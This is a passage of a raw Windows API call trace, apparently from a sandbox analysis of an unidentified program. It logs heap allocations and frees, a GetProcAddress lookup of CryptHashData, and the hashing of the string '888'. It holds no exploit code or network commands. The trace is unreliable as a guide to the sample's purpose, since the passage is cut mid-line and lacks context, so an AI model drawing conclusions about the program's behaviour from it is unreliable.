dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0157.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0157.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0157.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69888 [0157.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0157.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0157.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0157.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0157.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0157.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0157.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0157.985] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0157.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0157.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0157.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0157.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c68 [0157.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0157.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0157.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0157.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0157.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0157.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0157.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0157.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0157.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0157.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0157.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54d38 [0157.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0157.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0157.986] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0157.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0157.986] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54e08, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0157.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0157.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0157.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0157.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0157.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0157.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0157.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54e08 [0157.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0157.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0157.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c68 | out: hHeap=0x970000) returned 1 [0157.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0157.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0157.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0157.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0157.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0157.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0157.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0157.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0157.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0157.987] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0157.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0157.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0157.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0157.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0157.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0157.987] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0157.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd50 | out: hHeap=0x970000) returned 1 [0157.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0157.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50890 [0157.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0157.988] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0157.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0157.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0157.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0157.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0157.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0157.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0157.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0157.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0157.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0157.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0157.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0157.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0157.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0157.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0157.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0157.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0157.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0157.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0157.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0157.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0157.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0157.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0157.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0157.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0157.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0157.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0157.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0157.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0157.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0157.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0157.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b48 [0157.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0157.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0157.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0157.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0157.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0157.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0157.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0157.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0157.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0157.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0157.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0157.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0157.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0157.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0157.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0157.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0157.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977a28 [0157.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0157.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0157.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0157.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0157.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0157.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977a28 | out: hHeap=0x970000) returned 1 [0157.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0157.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0157.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0157.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0157.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0157.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0157.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0157.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0157.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0157.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0157.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0157.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0157.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0157.991] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0157.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0157.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0157.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0157.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0157.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0157.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0157.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0157.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0157.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0157.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0157.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0157.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0157.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0157.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0157.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0157.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0157.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0157.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0157.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0157.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0157.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0157.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0157.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0157.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0157.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0157.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0157.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0157.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0157.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0157.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0157.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0157.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0157.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0157.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0157.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0157.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0157.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0157.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0157.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0157.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0157.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0157.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0157.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0157.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0157.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0157.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0157.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0157.993] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0157.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe) returned 0x2e50b78 [0157.993] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e50b78, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0157.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0157.993] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0157.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0157.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0157.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0157.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0157.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0157.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0157.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0157.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0157.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0157.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0157.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0157.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0157.994] CryptHashData (hHash=0xa87110, pbData=0x2e54dd8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0157.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0157.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b88 [0157.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0157.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0157.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0157.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0157.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0157.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0157.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0157.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0157.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0157.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0157.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0157.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0157.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0157.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0157.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0157.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0157.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0157.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0157.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0157.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0157.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0157.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0157.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0157.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977908 [0157.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0157.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0157.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0157.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0157.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0157.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0157.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0157.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0157.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0157.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0157.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0157.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0157.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0157.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0157.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0157.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0157.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0157.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0157.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0157.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0157.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 